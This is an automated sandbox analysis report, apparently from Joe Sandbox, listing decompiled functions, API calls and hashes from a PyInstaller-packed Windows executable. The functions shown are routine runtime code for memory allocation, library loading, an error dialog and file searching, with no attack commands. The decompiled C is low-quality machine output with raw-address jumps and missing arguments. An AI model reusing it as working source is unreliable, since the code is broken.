Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0fa1f60e180c30099cd92909c4dd9370885fd91a8a3bc9aba6531de80905ccc9
Instruction ID: f9cb75b86dfed081d1e5178051efa6ceb2dd92a86c613ca8f2524a4e5c97fcbb
Opcode Fuzzy Hash: 0fa1f60e180c30099cd92909c4dd9370885fd91a8a3bc9aba6531de80905ccc9
Instruction Fuzzy Hash: 62F04F62B0D24780FE56765659003BCD2807FA8B80FCC04B2CD1E863C3ED6DE6A88230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8ECA1C Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7DA8ECA1C(intOrPtr* __rax, void* __rcx) {
				void* __rbx;

				if (__rcx - 0xffffffe0 > 0) goto 0xda8eca67;
				_t16 =  ==  ? __rax : __rcx;
				goto 0xda8eca4e;
				if (E00007FF77FF7DA8E8A3C() == 0) goto 0xda8eca67;
				if (E00007FF77FF7DA8F2600(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0xda8eca67;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0xda8eca39;
				goto 0xda8eca74;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0xc;
				return 0;
			}

0x7ff7da8eca29
0x7ff7da8eca33
0x7ff7da8eca37
0x7ff7da8eca40
0x7ff7da8eca4c
0x7ff7da8eca5a
0x7ff7da8eca63
0x7ff7da8eca65
0x7ff7da8eca67
0x7ff7da8eca6c
0x7ff7da8eca79

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF7DA8DFD94,?,?,?,00007FF7DA8E12A6,?,?,?,?,?,00007FF7DA8E2899), ref: 00007FF7DA8ECA5A

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a265fdf41e77f0447e092e6d79a5f46e27da0a7cb5c73acac927124eec024155
Instruction ID: b41c0a37077bb6284fdc9a78119566284772b6a1d620986c26f86d0f709e1859
Opcode Fuzzy Hash: a265fdf41e77f0447e092e6d79a5f46e27da0a7cb5c73acac927124eec024155
Instruction Fuzzy Hash: 15F05E91F1D24784FA66B6A1580167CD1807F64BA0FC806B2DD3E852C3ED2DA6709270

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7120 Relevance: 1.5, APIs: 1, Instructions: 20
libraryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00007FF77FF7DA8D7120(long long __rax, long long __rbx, void* __rcx, long long _a8) {
				void* _t18;
				void* _t20;
				void* _t24;

				_a8 = __rbx;
				_t18 = __rcx;
				r8d = 0;
				E00007FF77FF7DA8D79A0(__rax, __rbx, __rcx, __rcx, _t20, _t24);
				_t2 = _t18 + 8; // 0x8, executed
				r8d = _t2;
				LoadLibraryW(??); // executed
				return E00007FF77FF7DA8E3FEC(0, __rax, _t18, _t24);
			}

0x7ff7da8d7120
0x7ff7da8d712a
0x7ff7da8d712d
0x7ff7da8d7132
0x7ff7da8d713f
0x7ff7da8d713f
0x7ff7da8d7143
0x7ff7da8d7161

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

LoadLibraryW.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D7143

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 5b5ca48e77b775842357c011fabe18dc3e59ccea64c2b757d377e3a93be10156
Instruction ID: dc3b0c8360d962a8fd9354a05eb590aa92ef82cfb9f5738f0cb0594a101b6f94
Opcode Fuzzy Hash: 5b5ca48e77b775842357c011fabe18dc3e59ccea64c2b757d377e3a93be10156
Instruction Fuzzy Hash: 32E08612B1454246EE19A767A90546EE151AF88BD0BC89036EE4D07756DD2DD4A18A00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7DA8D1B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON

Download Yara Rule

APIs

GetDialogBaseUnits.USER32 ref: 00007FF7DA8D1BDE
MulDiv.KERNEL32 ref: 00007FF7DA8D1BF2
MulDiv.KERNEL32 ref: 00007FF7DA8D1C13
SystemParametersInfoW.USER32 ref: 00007FF7DA8D1C5B
CreateFontIndirectW.GDI32 ref: 00007FF7DA8D1C6F
#380.COMCTL32 ref: 00007FF7DA8D1C93
CreateWindowExW.USER32 ref: 00007FF7DA8D1CE6
CreateWindowExW.USER32 ref: 00007FF7DA8D1D40
CreateWindowExW.USER32 ref: 00007FF7DA8D1D9D
CreateWindowExW.USER32 ref: 00007FF7DA8D1DFF
SendMessageW.USER32 ref: 00007FF7DA8D1E1F
SendMessageW.USER32 ref: 00007FF7DA8D1E39
SendMessageW.USER32 ref: 00007FF7DA8D1E58
SendMessageW.USER32 ref: 00007FF7DA8D1E77
SendMessageW.USER32 ref: 00007FF7DA8D1E95
SendMessageW.USER32 ref: 00007FF7DA8D1EB3
SendMessageW.USER32 ref: 00007FF7DA8D1ED1
SendMessageW.USER32 ref: 00007FF7DA8D1EE9
SendMessageW.USER32 ref: 00007FF7DA8D1F01
GetClientRect.USER32 ref: 00007FF7DA8D1F10

Part of subcall function 00007FF7DA8D2030: GetDC.USER32 ref: 00007FF7DA8D205B
Part of subcall function 00007FF7DA8D2030: SelectObject.GDI32 ref: 00007FF7DA8D20A2
Part of subcall function 00007FF7DA8D2030: DrawTextW.USER32 ref: 00007FF7DA8D20C5
Part of subcall function 00007FF7DA8D2030: SelectObject.GDI32 ref: 00007FF7DA8D20DB
Part of subcall function 00007FF7DA8D2030: ReleaseDC.USER32 ref: 00007FF7DA8D20EB
Part of subcall function 00007FF7DA8D2030: MoveWindow.USER32 ref: 00007FF7DA8D213B
Part of subcall function 00007FF7DA8D2030: MoveWindow.USER32 ref: 00007FF7DA8D217B
Part of subcall function 00007FF7DA8D2030: MoveWindow.USER32 ref: 00007FF7DA8D21CE

Strings

STATIC, xrefs: 00007FF7DA8D1C9C, 00007FF7DA8D1CF1
BUTTON, xrefs: 00007FF7DA8D1DB6
Failed to execute script '%ls' due to unhandled exception: %ls, xrefs: 00007FF7DA8D1BBD
EDIT, xrefs: 00007FF7DA8D1D4B
Close, xrefs: 00007FF7DA8D1DA8

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
API String ID: 2446303242-1601438679
Opcode ID: 4520ec83f770e6a2a936c389ad8bea2580ac62345c30f60f61398c95f5315d36
Instruction ID: a96727584f35de9f401e892ccd9f57b91ab936ec9510a9ea568401378a703689
Opcode Fuzzy Hash: 4520ec83f770e6a2a936c389ad8bea2580ac62345c30f60f61398c95f5315d36
Instruction Fuzzy Hash: 11A15836208B8286E7149F21E58479EF360F788B90F90452AEF8D03B25DF3DE169CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD863229 Relevance: 21.3, APIs: 14, Instructions: 251fileCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFCFDA03F6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFCFDA03FBE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFCFDA03FCC
memset.VCRUNTIME140 ref: 00007FFCFDA03FE8
MultiByteToWideChar.KERNEL32 ref: 00007FFCFDA0400F
GetLastError.KERNEL32 ref: 00007FFCFDA0401C
MultiByteToWideChar.KERNEL32 ref: 00007FFCFDA04043
MultiByteToWideChar.KERNEL32 ref: 00007FFCFDA04098
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFCFDA040A9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFCFDA040B2
FindFirstFileW.KERNEL32 ref: 00007FFCFDA0421C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFCFDA0423E
FindNextFileW.KERNEL32 ref: 00007FFCFDA04259
WideCharToMultiByte.KERNEL32 ref: 00007FFCFDA042B7

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFind$ErrorFirstLastNextfreemallocmemset
String ID:
API String ID: 3372420414-0
Opcode ID: b84a2f744cee5a13916b1079a4c81b9897484e08d179ab741295abe408a7cb8c
Instruction ID: 7a045136432cf2b6996e8752433c57d7bf67a38b1a4551f57d3ca4839f3207a7
Opcode Fuzzy Hash: b84a2f744cee5a13916b1079a4c81b9897484e08d179ab741295abe408a7cb8c
Instruction Fuzzy Hash: 5EB1C122A09A9686EB108F65D468278B7A0FF48BA4F448235DA7D537D4FF7CE441C374

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD7412F0 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 365
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E00007FFC7FFCFD7412F0(signed int __rbx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, signed int __r9, signed long long __r10, long long _a32) {
				long long _v40;
				long long _v48;
				long long _v56;
				signed int _v72;
				signed long long _v248;
				long long _v256;
				long long _v264;
				long long _v272;
				void* _v280;
				void* __r12;
				void* __r13;
				void* __r14;
				void* __r15;
				intOrPtr _t52;
				intOrPtr _t53;
				signed char _t57;
				signed long long _t86;
				signed long long _t87;
				signed long long _t91;
				signed long long _t92;
				void* _t94;
				signed long long _t101;
				long long _t109;
				long long _t114;
				signed long long _t118;
				void* _t122;
				void* _t123;
				void* _t124;
				signed long long _t125;
				void* _t126;
				intOrPtr _t127;
				void* _t128;

				_t118 = __r10;
				_t114 = __r8;
				_t101 = __rdx;
				_t86 =  *0xfd84f008; // 0xda4bfe61f88d
				_t87 = _t86 ^  &_v280;
				_v72 = _t87;
				E00007FFC7FFCFD741930(_t94, __rdx, _t122, _t124, _t126, _t128);
				_v248 = _t87;
				_t125 = _t87;
				if (_t87 == 0) goto 0xfd74397f;
				_t57 =  *(_t87 + 0x20);
				r15d = _t57;
				r15d = r15d >> 2;
				r15d = r15d & 0x00000007;
				if ((_t57 & 0x00000020) == 0) goto 0xfd7437fe;
				r12d = 0x30;
				r12d =  ==  ? 0x48 : r12d;
				_t123 = _t122 + _t125;
				_t127 =  *((intOrPtr*)(_t125 + 0x10));
				if (_t127 - 0xffffffff > 0) goto 0xfd743969;
				__imp__PyMem_Malloc();
				_v264 = 0xffffffff;
				if (0xffffffff == 0) goto 0xfd743969;
				_a32 = __rbx;
				r10d = 0;
				_v40 = __rbp;
				_v48 = __rsi;
				r8d = 0;
				_v56 = __rdi;
				_v280 = __rbx;
				_v272 = _t114;
				_t18 = _t118 + 1; // 0x2
				if (_t118 - _t127 >= 0) goto 0xfd7414b6;
				if (_t114 > 0) goto 0xfd7416c0;
				if (r15d == 1) goto 0xfd74150b;
				if (r15d != 2) goto 0xfd741757;
				r8d =  *(_t123 + _t118 * 2) & 0x0000ffff;
				_t21 = _t114 - 0x1100; // -4352
				if (_t21 - 0x12 <= 0) goto 0xfd743818;
				_t52 =  *0xfd84f240; // 0x3c
				if (_t52 == 0) goto 0xfd741440;
				r9d = 0;
				if (r8d - _t52 < 0) goto 0xfd741440;
				if (r8d -  *((short*)(_t18 + 0x7ffcfd84f244)) + _t52 <= 0) goto 0xfd74145d;
				r9d = 1;
				_t53 =  *((intOrPtr*)(0x7ffcfd84f240 + _t101 * 8));
				if (_t53 != 0) goto 0xfd741414;
				_t27 = _t118 + 1; // 0x2
				 *(0xffffffff + __rbx * 4) = r8d;
				_t119 = _t27;
				_t91 = __rbx + 1;
				_v280 = _t91;
				goto 0xfd7413c2;
				_t35 = _t119 + 1; // 0x2
				_t109 = _t35;
				_v256 = _t109;
				if ( *((short*)(0x7ffcfd740000 + 0x10f246 + __r9 * 8)) - _t53 + r8d == 0xffffffff) goto 0xfd741444;
				if (r15d != 1) goto 0xfd741515;
				 *(0xffffffff + _t91 * 4) =  *(_t27 + _t123) & 0x000000ff;
				if (_t109 - _t127 < 0) goto 0xfd741529;
				_t92 = _t91 + 1;
				_v280 = _t92;
				goto 0xfd7413c2;
				if (_t92 != _t127) goto 0xfd7416e6;
				__imp__PyMem_Free();
				return E00007FFC7FFCFD7427A0( *(_t27 + _t123) & 0x000000ff,  *((short*)(_t18 + 0x7ffcfd84f244)) + _t52, _v72 ^  &_v280);
			}

0x7ffcfd7412f0
0x7ffcfd7412f0
0x7ffcfd7412f0
0x7ffcfd7412ff
0x7ffcfd741306
0x7ffcfd741309
0x7ffcfd741311
0x7ffcfd741316
0x7ffcfd74131b
0x7ffcfd741321
0x7ffcfd741327
0x7ffcfd74132a
0x7ffcfd74132d
0x7ffcfd741331
0x7ffcfd741338
0x7ffcfd741346
0x7ffcfd74134c
0x7ffcfd741350
0x7ffcfd741353
0x7ffcfd741364
0x7ffcfd741372
0x7ffcfd741378
0x7ffcfd741383
0x7ffcfd741389
0x7ffcfd741391
0x7ffcfd741394
0x7ffcfd74139e
0x7ffcfd7413a6
0x7ffcfd7413a9
0x7ffcfd7413b8
0x7ffcfd7413bd
0x7ffcfd7413c2
0x7ffcfd7413c9
0x7ffcfd7413d4
0x7ffcfd7413de
0x7ffcfd7413e8
0x7ffcfd7413ee
0x7ffcfd7413f3
0x7ffcfd7413fd
0x7ffcfd741403
0x7ffcfd74140d
0x7ffcfd74140f
0x7ffcfd741417
0x7ffcfd741426
0x7ffcfd74142a
0x7ffcfd741435
0x7ffcfd74143e
0x7ffcfd741440
0x7ffcfd741444
0x7ffcfd741448
0x7ffcfd741450
0x7ffcfd741453
0x7ffcfd741458
0x7ffcfd741466
0x7ffcfd741466
0x7ffcfd74146c
0x7ffcfd741477
0x7ffcfd741482
0x7ffcfd74148d
0x7ffcfd741494
0x7ffcfd7414a6
0x7ffcfd7414ac
0x7ffcfd7414b1
0x7ffcfd7414d1
0x7ffcfd7414da
0x7ffcfd74150a

APIs

Part of subcall function 00007FFCFD741930: PyMem_Malloc.PYTHON310 ref: 00007FFCFD74199B
Part of subcall function 00007FFCFD741930: PyType_IsSubtype.PYTHON310 ref: 00007FFCFD741A7D
Part of subcall function 00007FFCFD741930: PyType_IsSubtype.PYTHON310 ref: 00007FFCFD741ADA

PyMem_Malloc.PYTHON310 ref: 00007FFCFD741372
PyMem_Free.PYTHON310 ref: 00007FFCFD7414DA
PyErr_NoMemory.PYTHON310 ref: 00007FFCFD743969
_Py_Dealloc.PYTHON310 ref: 00007FFCFD743979

Strings

0, xrefs: 00007FFCFD741346

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
String ID: 0
API String ID: 4139299733-4108050209
Opcode ID: 556ee1b75b253449a6ab801974990bc94f4f522a89207a7f2870d22e180b8c06
Instruction ID: d937c6d8fd7e342df30b6c5ffbd26a4f7ea38e33899b98d664d1df4ed7c9069c
Opcode Fuzzy Hash: 556ee1b75b253449a6ab801974990bc94f4f522a89207a7f2870d22e180b8c06
Instruction Fuzzy Hash: 66F1D032A0CD7AC1E766AB149024679E3A4FB56746F004137DA6E8A6C8FF3CE441C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD741930 Relevance: 13.9, APIs: 9, Instructions: 435COMMON

Download Yara Rule

APIs

PyMem_Malloc.PYTHON310 ref: 00007FFCFD74199B
PyType_IsSubtype.PYTHON310 ref: 00007FFCFD741A7D
PyType_IsSubtype.PYTHON310 ref: 00007FFCFD741ADA
PyUnicode_FromKindAndData.PYTHON310 ref: 00007FFCFD741BAE
PyMem_Free.PYTHON310 ref: 00007FFCFD741BBA
PyMem_Realloc.PYTHON310 ref: 00007FFCFD741C99
PyMem_Free.PYTHON310 ref: 00007FFCFD743AEB
PyErr_NoMemory.PYTHON310 ref: 00007FFCFD743AF1

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Mem_$FreeSubtypeType_$DataErr_FromKindMallocMemoryReallocUnicode_
String ID:
API String ID: 3719493655-0
Opcode ID: a1393baf9ed4dd08cfcd5176976b0c5dae31a9ec4d34704da21d5360f0a31b8f
Instruction ID: 898b1949e23de208d9f50d52d9658817c9b8ed005c2560626f3c70aad2d5b21f
Opcode Fuzzy Hash: a1393baf9ed4dd08cfcd5176976b0c5dae31a9ec4d34704da21d5360f0a31b8f
Instruction Fuzzy Hash: 46022672B08D7AC2E726AB14D424679A6A1EB43742F444137DA6E4A7D8FF2CE440C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD7430E8 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFCFD743104
memset.VCRUNTIME140 ref: 00007FFCFD743128
RtlCaptureContext.KERNEL32 ref: 00007FFCFD743131
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFCFD74314B
RtlVirtualUnwind.KERNEL32 ref: 00007FFCFD74318C
memset.VCRUNTIME140 ref: 00007FFCFD7431BF
IsDebuggerPresent.KERNEL32 ref: 00007FFCFD7431E0
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFCFD743201
UnhandledExceptionFilter.KERNEL32 ref: 00007FFCFD74320C

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: d7e82cabd9796a5cc19c6e8637579e4198f8c251196789a756a290bf3cbab7b6
Instruction ID: fc33e93293cd74356f4860b7a2313cea54f4aa04f9771507f2ad500cc0d26af7
Opcode Fuzzy Hash: d7e82cabd9796a5cc19c6e8637579e4198f8c251196789a756a290bf3cbab7b6
Instruction Fuzzy Hash: 78318F72608F95C6EB619F60E8507EEB360FB86345F44443ADA5E4BA98EF38C548C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D6760 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139
COMMONCrypto

Download Yara Rule

C-Code - Quality: 53%

			E00007FF77FF7DA8D6760(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, void* __r9, intOrPtr _a8, char _a16, long long _a24, long long _a32, char _a56, signed int _a8248, void* _a8264) {
				void* __rsi;
				void* _t17;
				long _t21;
				void* _t50;
				void* _t60;
				signed long long _t72;
				signed long long _t73;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t131;
				void* _t132;
				void* _t133;
				void* _t135;

				_t131 = __r9;
				_t74 = __rbx;
				_t50 = __ecx;
				_a24 = __rbx;
				_a32 = __rbp;
				E00007FF77FF7DA8DAD20(0x2060, __rax, _t132, _t133);
				_t127 = _t126 - __rax;
				_t72 =  *0xda90d008; // 0xe3add53f52b8
				_t73 = _t72 ^ _t126 - __rax;
				_a8248 = _t73;
				_t124 = __rdx;
				_t135 = __rcx;
				if (__rdx == 0) goto 0xda8d67eb;
				E00007FF77FF7DA8D6970(_t73, "TMP");
				E00007FF77FF7DA8D6460(__edx, _t73, __rbx, _t124, __r8);
				if (_t73 == 0) goto 0xda8d68bf;
				_t17 = E00007FF77FF7DA8E6604(_t50, _t73, L"TMP", _t73);
				E00007FF77FF7DA8E3FEC(_t50, _t73, _t73, __r8);
				if (_t17 == 0) goto 0xda8d67f0;
				E00007FF77FF7DA8D2770(_t73, "LOADER: Failed to set the TMP environment variable.\n", _t73, __r8, _t131);
				goto 0xda8d6948;
				_t122 = _a8;
				_t21 = GetTempPathW(??, ??);
				0xda8e9054();
				r9d = _t21;
				_t130 = L"_MEI%d";
				E00007FF77FF7DA8D2470(_t73,  &_a16,  &_a56, L"_MEI%d", _t131);
				E00007FF77FF7DA8E72BC(_t131);
				if (E00007FF77FF7DA8D7810(_t73, _t74, _t73) == 0) goto 0xda8d68c6;
				E00007FF77FF7DA8E3FEC(0x1000, _t73,  &_a16, L"_MEI%d");
				if (1 - 5 < 0) goto 0xda8d6820;
				if (_t124 == 0) goto 0xda8d68bf;
				r8d = 0;
				E00007FF77FF7DA8D79A0(_t73, _t74, _t73, "TMP", _t122, L"_MEI%d");
				if (_t122 == 0) goto 0xda8d68a9;
				r8d = 0;
				_t119 = _t73;
				E00007FF77FF7DA8D79A0(_t73, _t74, _t73, _t122, _t122, L"_MEI%d");
				E00007FF77FF7DA8E6604(0, _t73, _t73, _t73);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, L"_MEI%d");
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, L"_MEI%d");
				E00007FF77FF7DA8E3FEC(0, _t122, _t73, L"_MEI%d");
				goto 0xda8d6948;
				SetEnvironmentVariableW(??, ??);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, _t130);
				goto 0xda8d6948;
				r8d = 0x1000;
				E00007FF77FF7DA8D7AB0(_t60, _t73, _t135, _t73, _t122, _t124, _t130);
				E00007FF77FF7DA8E3FEC(0, _t73, _t119, _t130);
				if (_t124 == 0) goto 0xda8d6943;
				r8d = 0;
				E00007FF77FF7DA8D79A0(_t73, _t73, _t119, "TMP", _t122, _t130);
				if (_t122 == 0) goto 0xda8d692d;
